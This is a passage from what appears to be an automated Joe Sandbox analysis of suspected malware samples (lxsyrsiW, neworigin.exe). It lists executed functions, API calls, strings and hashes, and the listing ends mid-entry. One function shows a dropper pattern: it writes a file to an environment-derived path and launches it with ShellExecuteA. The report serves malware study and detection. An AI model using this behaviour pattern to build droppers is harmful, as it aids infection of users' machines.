Execution Coverage:	25%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	13.9%
Total number of Nodes:	36
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0040108C Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 207
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004010A6
memset.MSVCRT ref: 004010EE
strcmp.MSVCRT ref: 00401180
strcpy.MSVCRT(?,00000000), ref: 004011CE
EntryPoint.LXSYRSIW(?,?), ref: 004011BE

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

EntryPoint.LXSYRSIW(?,?), ref: 00401202
getenv.MSVCRT ref: 0040120B
EntryPoint.LXSYRSIW(?,?), ref: 00401246
sprintf.MSVCRT ref: 00401263
fopen.MSVCRT ref: 00401278
EntryPoint.LXSYRSIW(?,?), ref: 004012B3
fwrite.MSVCRT ref: 004012DD
fclose.MSVCRT ref: 004012EC
EntryPoint.LXSYRSIW(00477C65,00000004), ref: 0040131C
ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 00401344

Strings

%s\%s, xrefs: 00401256, 0040125B

Memory Dump Source

Source File: 0000000C.00000001.1461457006.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000001.1461457006.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000001.1461457006.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd

Similarity

API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID: %s\%s
API String ID: 2742963760-4073750446
Opcode ID: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
Instruction ID: 7e0938a0f735226449982c757e1a15bee8303af7c1bff0ef3dea70518ca31291
Opcode Fuzzy Hash: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
Instruction Fuzzy Hash: 9971F4F1E001049BDB54DB9CDC81B9E77B9DB48309F04417AF60AFB391E639AA448B59

Function 00401155 Relevance: 13.6, APIs: 9, Instructions: 113
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.MSVCRT ref: 00401180
strcpy.MSVCRT(?,00000000), ref: 004011CE
EntryPoint.LXSYRSIW(?,?), ref: 004011BE

Part of subcall function 00401000: malloc.MSVCRT ref: 0040100F

EntryPoint.LXSYRSIW(?,?), ref: 00401202
getenv.MSVCRT ref: 0040120B
EntryPoint.LXSYRSIW(?,?), ref: 00401246
sprintf.MSVCRT ref: 00401263
fopen.MSVCRT ref: 00401278
EntryPoint.LXSYRSIW(?,?), ref: 004012B3
fwrite.MSVCRT ref: 004012DD
fclose.MSVCRT ref: 004012EC
EntryPoint.LXSYRSIW(00477C65,00000004), ref: 0040131C
ShellExecuteA.SHELL32(00000000,00000000,?,0000000A,0000000A,0000000A), ref: 00401344

Memory Dump Source

Source File: 0000000C.00000001.1461457006.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000001.1461457006.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000001.1461457006.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd

Similarity

API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
String ID:
API String ID: 2992075992-0
Opcode ID: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
Instruction ID: da6ba3fb88c20024e61c29d0d1421e634aa01f37861d58f563f893074dd25450
Opcode Fuzzy Hash: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
Instruction Fuzzy Hash: F54135F0E101049BDB58DB58DC91B9D77B9DB44309F0441BAF60AFB391E63CAA88CB59

Function 00401475 Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040148F
__set_app_type.MSVCRT ref: 004014A8
_controlfp.MSVCRT ref: 004014BC
__getmainargs.MSVCRT ref: 004014EA
exit.MSVCRT ref: 0040151C

Memory Dump Source

Source File: 0000000C.00000001.1461457006.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000001.1461457006.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000001.1461457006.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd

Similarity

API ID: __getmainargs__set_app_type_controlfpexitmemset
String ID:
API String ID: 1611591150-0
Opcode ID: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
Instruction ID: 9bdd3bf799432f41f787d58fcaaf5403f241b1bf87296188f28308fcf3b5ab6f
Opcode Fuzzy Hash: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
Instruction Fuzzy Hash: CA110CF5E00104AFCB01EBB8EC85F4A77ACA74C304F50447AB909E7361E979EA448769

Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 0040100F

Strings

j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv, xrefs: 0040106E

Memory Dump Source

Source File: 0000000C.00000001.1461457006.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000001.1461457006.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000001.1461457006.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd

Similarity

API ID: malloc
String ID: j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv
API String ID: 2803490479-2443507578
Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45

Function 004013FF Relevance: 2.5, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D`4wD`4w, xrefs: 00401411, 00401414
D`4wD`4w, xrefs: 00401438, 0040143D

Memory Dump Source

Source File: 0000000C.00000001.1461457006.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000001.1461457006.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000001.1461457006.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd

Similarity

API ID: memset$EntryPointfopenstrcmpstrcpy
String ID: D`4wD`4w$D`4wD`4w
API String ID: 4108700736-3394693991
Opcode ID: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
Instruction ID: 7b5742814f41c47d4244d2c3f0283e0289412fe64b87ae5b76c2526650b71fed
Opcode Fuzzy Hash: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
Instruction Fuzzy Hash: 4BF074B5A04248AFCB40EFB9D981D8A77F8BB4C304B5044B6F948D7351E674EA448B58

Non-executed Functions

Function 004BF794 Relevance: .1, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000001.1461457006.0000000000479000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000001.1461457006.0000000000400000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000001.1461457006.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5da5beaf849cc9916f868562d7cf2760962aee5cc7597a20a15516dd34ea1941
Instruction ID: 9dce6d6b8b05ab0a555f06944759f9cc391f65fca432f5fc4cfe5cd17794a38a
Opcode Fuzzy Hash: 5da5beaf849cc9916f868562d7cf2760962aee5cc7597a20a15516dd34ea1941
Instruction Fuzzy Hash: 9631F3329052446ACF32A96C5C146F77B64AB62BB0F1C45F7E44C86792DB2C8C4DC2BC

Function 004015D7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000001.1461457006.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000001.1461457006.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000001.1461457006.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_1_400000_lxsyrsiW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1956bb551ae66424eeb29415ec14ed0c03fc86ff94ae4dcffb4638495b0d7fb1
Instruction ID: 66f553c3c70c46b8825420ed88d2deaa6b5bdf89b3e430e74c23cac08a3ac52f
Opcode Fuzzy Hash: 1956bb551ae66424eeb29415ec14ed0c03fc86ff94ae4dcffb4638495b0d7fb1
Instruction Fuzzy Hash: 65A00457F1D540DFD71317107C5515037745F1554575D4CF3445545053D11D44445535

Analysis Process: neworigin.exePID: 6424, Parent PID: 3192COMMON

Execution Graph

Execution Coverage:	12.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	2

Executed Functions

Function 06A93178 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 06A93877
$q, xrefs: 06A938D0
$q, xrefs: 06A938AC
$q, xrefs: 06A938A0
$q, xrefs: 06A938C4
$q, xrefs: 06A93883

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q
API String ID: 0-2069967915
Opcode ID: a68f37ade6bb91c7110a688b698492f97ffe2d3097f5e54957d77674a558bf97
Instruction ID: e3523ed4f54cc3b88f28f32efbfa620d4ec3b1fb703c6fce9577dc519ff5a1c9
Opcode Fuzzy Hash: a68f37ade6bb91c7110a688b698492f97ffe2d3097f5e54957d77674a558bf97
Instruction Fuzzy Hash: 6D322E31E107198FDF14EF69C85069DB7F2BF99300F60C6A9E449AB254EF70A985CB90

Function 06A97E78 Relevance: 3.0, Strings: 2, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 06A98413
$q, xrefs: 06A9841F

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: bfb75b3dbb5b6980883d2b60c676ba1a5f4eaec2d9e7cd91520d602703e387e9
Instruction ID: 30debdf071a84280d352550c83e6c16fecd7ef5ea3c5dbb5882e53ed17a8937f
Opcode Fuzzy Hash: bfb75b3dbb5b6980883d2b60c676ba1a5f4eaec2d9e7cd91520d602703e387e9
Instruction Fuzzy Hash: 59026C31B002158FDF54EB68D990AAEB7F6BF89300F248929D4159B354DB75EC82CBA0

Function 06A92350 Relevance: 1.0, Instructions: 1047COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b051d64c8fc96782f4465b57b51f8e19c7adc137d2ca9005716ee0e4afc486c
Instruction ID: 4202584d3bd1aa2ffb7c6229e74165d6b10aba94113aa8dc517b9f3be0992408
Opcode Fuzzy Hash: 8b051d64c8fc96782f4465b57b51f8e19c7adc137d2ca9005716ee0e4afc486c
Instruction Fuzzy Hash: FFA24434A102049FDFA4EB68C594B9DB7F2EB49314F6484A9D409AF361DB34ED85CFA0

Function 06A966E8 Relevance: .8, Instructions: 814COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c86b6c64f5af6314b6e4a5f943ade8ed699fa7c8d21c41ca9b9a9772fd301a3c
Instruction ID: e4f0d6ed5fd3ec011b78bce225227f0ed229cec9711b8e807c2a1bab18b3c184
Opcode Fuzzy Hash: c86b6c64f5af6314b6e4a5f943ade8ed699fa7c8d21c41ca9b9a9772fd301a3c
Instruction Fuzzy Hash: 4B62AC34A102049FEF54EB68D594BADB7F2EF89310F248969E406DB354DB35EC46CBA0

Function 06A9C2A0 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 492a8ba09f64d45ce4d25032fc449f4203649d655686a113032b137cb6ca003d
Instruction ID: 82e8881df8fcfb5d9e616b87a4f9e692a88098c7be071bf9533fa949315288c4
Opcode Fuzzy Hash: 492a8ba09f64d45ce4d25032fc449f4203649d655686a113032b137cb6ca003d
Instruction Fuzzy Hash: BE325D75B106089FDF54EB68D990BAEB7F2EB88320F208525E506DB355DB35EC41CBA0

Function 06A956B8 Relevance: .6, Instructions: 588COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 410d7fc41187440439f96208eb890fc663b9619fb9f69655c5f996f71c822ac8
Instruction ID: c4cce96432fdffad10c4d6d75109d63ffb76065cde6ff31e8ca9adb10b92eed6
Opcode Fuzzy Hash: 410d7fc41187440439f96208eb890fc663b9619fb9f69655c5f996f71c822ac8
Instruction Fuzzy Hash: B812C231E002159FDF65EB68D8857AEBBF2EF85310F248829D9159F384DA34EC45CBA0

Function 06A9B32A Relevance: .6, Instructions: 572COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48edec6233eb084266cea73bf9244ded275ff91009b2e05e2697528df7585f9c
Instruction ID: a7223401a2318ecd76b8eeccd123e5f4640748d022d3cdcade9626fb3af59cd7
Opcode Fuzzy Hash: 48edec6233eb084266cea73bf9244ded275ff91009b2e05e2697528df7585f9c
Instruction Fuzzy Hash: 74224A74E102098BEF64EB68E4907AEB7F2FB89310F608526E445DB795CA34DC81CB71

Function 06A9ADD0 Relevance: 10.4, Strings: 8, Instructions: 401
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 06A9AF44
$q, xrefs: 06A9AFA8
$q, xrefs: 06A9AEF1
$q, xrefs: 06A9AF73
$q, xrefs: 06A9AF7F
$q, xrefs: 06A9AF9C
$q, xrefs: 06A9AF50
$q, xrefs: 06A9AEFD

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q$$q$$q
API String ID: 0-3886557441
Opcode ID: efbfc3209fad50f57e3fc15586dc65e14224ed1991c946659997ef8f022cbea7
Instruction ID: 32e5772fbcee331a16dde8880b10ebdc0737a55137b688b685febc4a0324bca9
Opcode Fuzzy Hash: efbfc3209fad50f57e3fc15586dc65e14224ed1991c946659997ef8f022cbea7
Instruction Fuzzy Hash: 8EE18F31F102198FDF64EB68D4906AEB7F2FF89304F20852AD506AB344DB759C46CBA1

Function 06A9B760 Relevance: 8.0, Strings: 6, Instructions: 472
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 06A9BCC5
$q, xrefs: 06A9BD2D
$q, xrefs: 06A9BCF9
$q, xrefs: 06A9BCED
$q, xrefs: 06A9BCB9
$q, xrefs: 06A9BD21

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q
API String ID: 0-2069967915
Opcode ID: 9433ecb95a670053ee1847cca5533251626c3cdac9a35a1eb59216098b785796
Instruction ID: 6351182f9c1377fe41f1949cf2af21253857c0990790bf00f815f4effbdd1902
Opcode Fuzzy Hash: 9433ecb95a670053ee1847cca5533251626c3cdac9a35a1eb59216098b785796
Instruction Fuzzy Hash: 9C023930E102098FDF64EF68E5906AEB7F1FB49310F20892AD415DB395DB74E885CBA1

Function 06A99250 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 06A99297
$q, xrefs: 06A992DE
$q, xrefs: 06A992D2
$q, xrefs: 06A992A3

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q
API String ID: 0-4102054182
Opcode ID: 02317efc7cb6338a7193f6244a03004bfbf78b5936d1b845119f8be61e81f927
Instruction ID: ce2afead56bce744afd84a4d8ad4d0008f184ba70745e3e58510d75e33b798d3
Opcode Fuzzy Hash: 02317efc7cb6338a7193f6244a03004bfbf78b5936d1b845119f8be61e81f927
Instruction Fuzzy Hash: C1919071B002199FDF64EB68D860BAF77F6BF89300F648569C409AB345EB709D41CBA0

Function 06A9D060 Relevance: 4.6, Strings: 3, Instructions: 800
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 06A9D46B
$q, xrefs: 06A9D45F
$q, xrefs: 06A9D457

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID: $q$$q$$q
API String ID: 0-3067366958
Opcode ID: 2cfc2f02c47149ed8d6e335af7b0f94fc46a2f2b20c006773cc4140500b969ac
Instruction ID: df56ca155ba68e1c1c6710b7741aa1213ae7fd2f8b272af76fdd37867cccb680
Opcode Fuzzy Hash: 2cfc2f02c47149ed8d6e335af7b0f94fc46a2f2b20c006773cc4140500b969ac
Instruction Fuzzy Hash: 55627D70A006098FDB14EF68D590A5EB7F2FF89300B60CA68D0469F359DB75EC86CB90

Function 06A94C88 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fq, xrefs: 06A94CB3
XPq, xrefs: 06A94DD9
\Oq, xrefs: 06A94E63

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID: fq$XPq$\Oq
API String ID: 0-132346853
Opcode ID: 60c904ba39c9d16967886a8a76970edf2fb8f3ff4082685c0275e1bcf7303628
Instruction ID: e7ae0558778dc715cc2e15654e7fe740db39281303021144dc9afe11d1a18ad1
Opcode Fuzzy Hash: 60c904ba39c9d16967886a8a76970edf2fb8f3ff4082685c0275e1bcf7303628
Instruction Fuzzy Hash: 87617371F002199FEF54EBA9C8547AEBBF2FF88300F20842AE105AB394DB755C458B90

Function 06A99241 Relevance: 2.7, Strings: 2, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 06A99297
$q, xrefs: 06A992D2

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: c6ccb0e7ff1d6bf500d4dd9b4c2be71121c3839bad50678f996db6a42e177a03
Instruction ID: 982d25c65497f1491ac5f34572c1c04fae39fb805001cb3cd27ad24601b397d4
Opcode Fuzzy Hash: c6ccb0e7ff1d6bf500d4dd9b4c2be71121c3839bad50678f996db6a42e177a03
Instruction Fuzzy Hash: BC515071B402089FDB55EB78D960BAF77F6BB89300F148569C909DB349EB709D01CBA1

Function 06A94C78 Relevance: 2.6, Strings: 2, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fq, xrefs: 06A94CB3
XPq, xrefs: 06A94DD9

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID: fq$XPq
API String ID: 0-3167736908
Opcode ID: 30437cd32c3e1ae105837892331c4b0d5ac9678516098056ce79a8af5881c99e
Instruction ID: 9c033a022dc2a84cda1116611fed209e861dcc96180a0c2e681367d99569391b
Opcode Fuzzy Hash: 30437cd32c3e1ae105837892331c4b0d5ac9678516098056ce79a8af5881c99e
Instruction Fuzzy Hash: CA517031F002199FEF54ABA9C8547AEBBF2FF88300F248529E105AF394DA759C458B90

Function 06A94CB0 Relevance: 2.6, Strings: 2, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fq, xrefs: 06A94CB3
XPq, xrefs: 06A94DD9

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID: fq$XPq
API String ID: 0-3167736908
Opcode ID: 2004d8c91cf15b4b7b0a3bbc7db26eecce8d66dc00562dd95d83ab87e465764f
Instruction ID: da24016f8d4d12defa5a5221776796c2ac55989bc8421c55980d695c5761e6fb
Opcode Fuzzy Hash: 2004d8c91cf15b4b7b0a3bbc7db26eecce8d66dc00562dd95d83ab87e465764f
Instruction Fuzzy Hash: 39412C71F002199FEF54EFA9C4547AEBAF2FF88700F24852AE105AF394DA749C458B90

Function 0121EF08 Relevance: 1.6, APIs: 1, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.1598356344.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1210000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2d202f64956d112a68d8058fae5e4ef665ca60c9c45f823a02ad9209d463b07
Instruction ID: 5c02ce41df8768061cf4437e17be5e04c39c20d5de6ca94e97ed3bdbf24ea355
Opcode Fuzzy Hash: c2d202f64956d112a68d8058fae5e4ef665ca60c9c45f823a02ad9209d463b07
Instruction Fuzzy Hash: 77416872E003968FDB15DF79D8003EEBBF1AF89310F15856AC954A7341D7349845CBA0

Function 0121EFF0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 0121F057

Memory Dump Source

Source File: 0000000D.00000002.1598356344.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1210000_neworigin.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 929ea2754188a07d6d459aa533d37c8851b665a374dfcc3d9c49fb5bd57885f7
Instruction ID: e2d6a0b411b91fc210aaa0bb3bd1b6bff0754955917703b9c8515feb747ed92c
Opcode Fuzzy Hash: 929ea2754188a07d6d459aa533d37c8851b665a374dfcc3d9c49fb5bd57885f7
Instruction Fuzzy Hash: EB1123B1C0025A9BDB10CF9AC544BDEFBF4AF48220F14812AD828A7240D378A944CFA5

Function 06A9DBD5 Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

PHq, xrefs: 06A9DD31

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID: PHq
API String ID: 0-3820536768
Opcode ID: 1edf80349e4abb64b10f0893f47d0af333603c506db49eead66318e48c4c29c7
Instruction ID: 732417426e9a398344149adc6a20d58588f9232c801a31e23d3830ea734ef9bc
Opcode Fuzzy Hash: 1edf80349e4abb64b10f0893f47d0af333603c506db49eead66318e48c4c29c7
Instruction Fuzzy Hash: FC41B274A007099FDF60EF75C4946AEBBF2BF86300F244529E441EB244DBB5A886CB60

Function 06A921D8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PHq, xrefs: 06A92313

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID: PHq
API String ID: 0-3820536768
Opcode ID: 93e6e4cefcf6f60d191fb895fd1f1ecfcfd1bdb66b8cbf5d7fe8139a5d9e6818
Instruction ID: b998875c0e52d3d0af3ee155040bf6de540825e297add2ff700df1a3016b6d9d
Opcode Fuzzy Hash: 93e6e4cefcf6f60d191fb895fd1f1ecfcfd1bdb66b8cbf5d7fe8139a5d9e6818
Instruction Fuzzy Hash: 6631D030B202059FDF59AB74D5647AE7BE2BB89600F604568E402DB384DF36CD05CBA1

Function 06A983C8 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

$q, xrefs: 06A98413

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID: $q
API String ID: 0-1301096350
Opcode ID: 9c3e71ab12a766ff78297dcfdc99f49be3fc273c9394e0de6f31776465a53677
Instruction ID: 337ee0d7ae31d92cb10f2f9a8512e54e38a972da4e1b80b5e54fb66941d63a58
Opcode Fuzzy Hash: 9c3e71ab12a766ff78297dcfdc99f49be3fc273c9394e0de6f31776465a53677
Instruction Fuzzy Hash: C0F0DC36A002008FDF64AB58EA906A877E9EFC2210F244D66D905CF201D73DD941CFB0

Function 06A962E8 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfa93f5d1823fdb9dd9f247c0abd69d84af21604be7b09297000d535b768fa0e
Instruction ID: 539da86e4f94e0d1d8de86579697b30142ee1c3b658d30baa1f187c2f79cec02
Opcode Fuzzy Hash: bfa93f5d1823fdb9dd9f247c0abd69d84af21604be7b09297000d535b768fa0e
Instruction Fuzzy Hash: 0661A271F001214BDF54AB7EC89069FBAE7AF85610B294439D40AEB364DEB5ED028791

Function 06A943B9 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

